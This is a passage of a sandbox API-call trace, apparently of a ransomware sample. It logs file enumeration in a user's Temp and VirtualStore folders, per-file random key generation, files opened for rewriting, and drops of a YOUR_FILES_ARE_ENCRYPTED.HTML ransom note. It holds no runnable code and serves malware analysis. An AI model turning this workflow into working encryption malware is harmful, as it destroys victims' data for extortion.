dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7758c68, lpOverlapped=0x7758c68) returned 1 [0164.319] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30983110, ftCreationTime.dwHighDateTime=0x1d7debb, ftLastAccessTime.dwLowDateTime=0x158e80a0, ftLastAccessTime.dwHighDateTime=0x1d7e013, ftLastWriteTime.dwLowDateTime=0x158e80a0, ftLastWriteTime.dwHighDateTime=0x1d7e013, nFileSizeHigh=0x0, nFileSizeLow=0x11709, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Z86YbAKEXD.gif", cAlternateFileName="Z86YBA~1.GIF")) returned 1 [0164.319] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Z86YbAKEXD.gif") returned 57 [0164.319] lstrcmpW (lpString1="Z86YbAKEXD.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0164.319] PathFindExtensionW (pszPath="Z86YbAKEXD.gif") returned=".gif" [0164.319] lstrlenW (lpString=".gif") returned 4 [0164.319] PathFindExtensionW (pszPath="Z86YbAKEXD.gif") returned=".gif" [0164.319] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Z86YbAKEXD.gif" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\z86ybakexd.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e0 [0164.320] GetFileSizeEx (in: hFile=0x5e0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=71433) returned 1 [0164.320] GetProcessHeap () returned 0x270000 [0164.320] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7780dc0 [0164.323] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="F8") returned 2 [0164.323] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="E2") returned 2 [0164.323] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="C6") returned 2 [0164.323] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="82") returned 2 [0164.323] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="CD") returned 2 [0164.323] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="60") returned 2 [0164.323] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="73") returned 2 [0164.323] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="D2") returned 2 [0164.323] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="27") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="A5") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="4F") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="50") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="34") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="CA") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="8A") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="E5") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="A2") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="68") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="3E") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="96") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="D0") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="AB") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="CF") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="9C") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="EE") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="6E") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="6A") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="94") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="7B") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="79") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="30") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="19") returned 2 [0164.325] lstrcpyW (in: lpString1=0x7790e74, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Z86YbAKEXD.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Z86YbAKEXD.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Z86YbAKEXD.gif" [0164.325] CreateIoCompletionPort (FileHandle=0x5e0, ExistingCompletionPort=0x3a0, CompletionKey=0x7780dc0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.325] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7780dc0, lpOverlapped=0x7780dc0) returned 1 [0164.325] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5ada51f0, ftCreationTime.dwHighDateTime=0x1d7e24f, ftLastAccessTime.dwLowDateTime=0x909330c0, ftLastAccessTime.dwHighDateTime=0x1d7e4c3, ftLastWriteTime.dwLowDateTime=0x909330c0, ftLastWriteTime.dwHighDateTime=0x1d7e4c3, nFileSizeHigh=0x0, nFileSizeLow=0xd25f, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Zw7NPqE30QDSa5q.ods", cAlternateFileName="ZW7NPQ~1.ODS")) returned 1 [0164.325] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Zw7NPqE30QDSa5q.ods") returned 62 [0164.325] lstrcmpW (lpString1="Zw7NPqE30QDSa5q.ods", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0164.325] PathFindExtensionW (pszPath="Zw7NPqE30QDSa5q.ods") returned=".ods" [0164.325] lstrlenW (lpString=".ods") returned 4 [0164.325] PathFindExtensionW (pszPath="Zw7NPqE30QDSa5q.ods") returned=".ods" [0164.325] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Zw7NPqE30QDSa5q.ods" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\zw7npqe30qdsa5q.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0164.326] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=53855) returned 1 [0164.326] GetProcessHeap () returned 0x270000 [0164.326] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x77a8f18 [0164.717] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="1D") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="9F") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="9C") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="43") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="1B") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="A8") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="86") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="C0") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="FB") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="81") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="E8") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="A8") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="4C") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="73") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="B9") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="E0") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="02") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="39") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="AE") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="36") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="F4") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="E6") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="A9") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="00") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="EE") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="EE") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="AE") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="B7") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="A7") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="CA") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="A5") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="55") returned 2 [0164.719] lstrcpyW (in: lpString1=0x77b8fcc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Zw7NPqE30QDSa5q.ods" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Zw7NPqE30QDSa5q.ods") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Zw7NPqE30QDSa5q.ods" [0164.719] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x77a8f18, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.719] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x77a8f18, lpOverlapped=0x77a8f18) returned 1 [0164.754] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb14d9ec0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xb14d9ec0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xb14d9ec0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="~DF0EA31AB184F586BB.TMP", cAlternateFileName="~DF0EA~1.TMP")) returned 1 [0164.755] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\~DF0EA31AB184F586BB.TMP") returned 66 [0164.755] lstrcmpW (lpString1="~DF0EA31AB184F586BB.TMP", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.755] PathFindExtensionW (pszPath="~DF0EA31AB184F586BB.TMP") returned=".TMP" [0164.755] lstrlenW (lpString=".TMP") returned 4 [0164.755] PathFindExtensionW (pszPath="~DF0EA31AB184F586BB.TMP") returned=".TMP" [0164.755] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xab3fffa0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab3fffa0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab3fffa0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="~DF1891F92DEE8F97F3.TMP", cAlternateFileName="~DF189~1.TMP")) returned 1 [0164.755] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\~DF1891F92DEE8F97F3.TMP") returned 66 [0164.755] lstrcmpW (lpString1="~DF1891F92DEE8F97F3.TMP", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.755] PathFindExtensionW (pszPath="~DF1891F92DEE8F97F3.TMP") returned=".TMP" [0164.755] lstrlenW (lpString=".TMP") returned 4 [0164.755] PathFindExtensionW (pszPath="~DF1891F92DEE8F97F3.TMP") returned=".TMP" [0164.755] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xaba19800, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaba19800, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaba19800, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="~DF25B808F52B8C25D0.TMP", cAlternateFileName="~DF25B~1.TMP")) returned 1 [0164.755] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\~DF25B808F52B8C25D0.TMP") returned 66 [0164.755] lstrcmpW (lpString1="~DF25B808F52B8C25D0.TMP", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.755] PathFindExtensionW (pszPath="~DF25B808F52B8C25D0.TMP") returned=".TMP" [0164.755] lstrlenW (lpString=".TMP") returned 4 [0164.755] PathFindExtensionW (pszPath="~DF25B808F52B8C25D0.TMP") returned=".TMP" [0164.755] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xb1500020, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xb1500020, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xb1500020, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="~DF780260E18E183789.TMP", cAlternateFileName="~DF780~1.TMP")) returned 1 [0164.755] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\~DF780260E18E183789.TMP") returned 66 [0164.755] lstrcmpW (lpString1="~DF780260E18E183789.TMP", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.756] PathFindExtensionW (pszPath="~DF780260E18E183789.TMP") returned=".TMP" [0164.756] lstrlenW (lpString=".TMP") returned 4 [0164.756] PathFindExtensionW (pszPath="~DF780260E18E183789.TMP") returned=".TMP" [0164.756] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb14d9ec0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xb14d9ec0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xb1500020, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="~DFA0E187D36AAD4505.TMP", cAlternateFileName="~DFA0E~1.TMP")) returned 1 [0164.756] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\~DFA0E187D36AAD4505.TMP") returned 66 [0164.756] lstrcmpW (lpString1="~DFA0E187D36AAD4505.TMP", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.756] PathFindExtensionW (pszPath="~DFA0E187D36AAD4505.TMP") returned=".TMP" [0164.756] lstrlenW (lpString=".TMP") returned 4 [0164.756] PathFindExtensionW (pszPath="~DFA0E187D36AAD4505.TMP") returned=".TMP" [0164.756] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xb14d9ec0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xb14d9ec0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xb14d9ec0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="~DFB260B44B84FD6F03.TMP", cAlternateFileName="~DFB26~1.TMP")) returned 1 [0164.756] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\~DFB260B44B84FD6F03.TMP") returned 66 [0164.756] lstrcmpW (lpString1="~DFB260B44B84FD6F03.TMP", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.756] PathFindExtensionW (pszPath="~DFB260B44B84FD6F03.TMP") returned=".TMP" [0164.756] lstrlenW (lpString=".TMP") returned 4 [0164.756] PathFindExtensionW (pszPath="~DFB260B44B84FD6F03.TMP") returned=".TMP" [0164.756] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xb14d9ec0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xb14d9ec0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xb14d9ec0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="~DFB260B44B84FD6F03.TMP", cAlternateFileName="~DFB26~1.TMP")) returned 0 [0164.756] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0164.757] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 72 [0164.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0164.758] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0164.760] CloseHandle (hObject=0x598) returned 1 [0164.761] GetProcessHeap () returned 0x270000 [0164.761] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.765] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0164.765] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temporary Internet Files") returned 62 [0164.765] GetProcessHeap () returned 0x270000 [0164.765] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0164.767] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temporary Internet Files" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temporary Internet Files") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temporary Internet Files" [0164.767] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temporary Internet Files", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temporary Internet Files\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temporary Internet Files\\*" [0164.767] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temporary Internet Files\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xb14d9ec0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xb14d9ec0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xb14d9ec0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="~DFB260B44B84FD6F03.TMP", cAlternateFileName="Hݞ")) returned 0xffffffff [0164.767] GetProcessHeap () returned 0x270000 [0164.768] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.768] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd2dae310, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2dae310, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd2dae310, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0164.768] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore") returned 50 [0164.768] GetProcessHeap () returned 0x270000 [0164.768] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0164.768] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore" [0164.768] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore\\*" [0164.768] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd2dae310, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2dae310, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd2dae310, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0164.769] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd2dae310, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2dae310, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd2dae310, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0164.769] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd2dae310, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2dae310, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd2dae310, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 0 [0164.769] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0164.769] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0164.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\VirtualStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\virtualstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0164.770] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: 